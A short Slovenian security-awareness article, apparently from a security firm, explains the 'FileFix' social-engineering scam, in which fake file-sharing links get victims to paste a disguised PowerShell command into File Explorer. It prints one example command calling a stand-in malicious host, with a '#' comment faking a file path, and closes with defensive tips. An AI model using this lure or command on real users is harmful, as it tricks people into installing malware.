Avtor: Vid Grosek, certificiran etični heker
FileFix predstavlja evolucijo prejšnjih napadov s socialnim inženiringom, kot so lažne sheme CAPTCHA. Namesto izkoriščanja tehničnih ranljivosti ta prevara cilja na nepazljivost uporabnikov pri deljenju datotek prek spleta.
Mehanizem napada
Napad poteka v štirih fazah:
1. Začetni stik
Uporabniki prejmejo sporočila, ki promovirajo dostop do dokumentov (npr. “HRPolicy.docx”) prek povezav, ki oponašajo SharePoint, OneDrive ali Microsoft 365.
2. Lažna navodila
Žrtve so usmerjene, naj odprejo File Explorer in pritisnejo Ctrl+L za dostop do naslovne vrstice.
3. Vbrizganje ukaza
Uporabniki nevede prilepijo zlonamerni ukaz, prikrit kot pot do datoteke:
powershell.exe malicioussite.exe#You will begin to download C:\Sharepoint\HRPolicy.docx
4. Izvedba
Pritisk tipke Enter izvede skriti ukaz, prenese zlonamerno programsko opremo, medtem ko besedilo za simbolom “#” (ki ga operacijski sistem ignorira) ustvari lažno legitimnost.
Zakaj je nevaren
Napad FileFix cilja na nepazljivost uporabnikov pri deljenju datotek preko interneta. V celoti se izogiba tehničnim ranljivostim in se zanaša na psihološko manipulacijo ter znane vmesnike.
Zaščitni ukrepi
- Kopirajte ukaze/poti samo iz zaupanja vrednih virov
- Ustavite se in preverite verodostojnost vira, preden izvedete ukaze
- Takoj prijavite sumljivo dejavnost IT ekipam za hiter odziv
Za pomoč pri kibernetski varnosti nas kontaktirajte na prodaja@telprom.si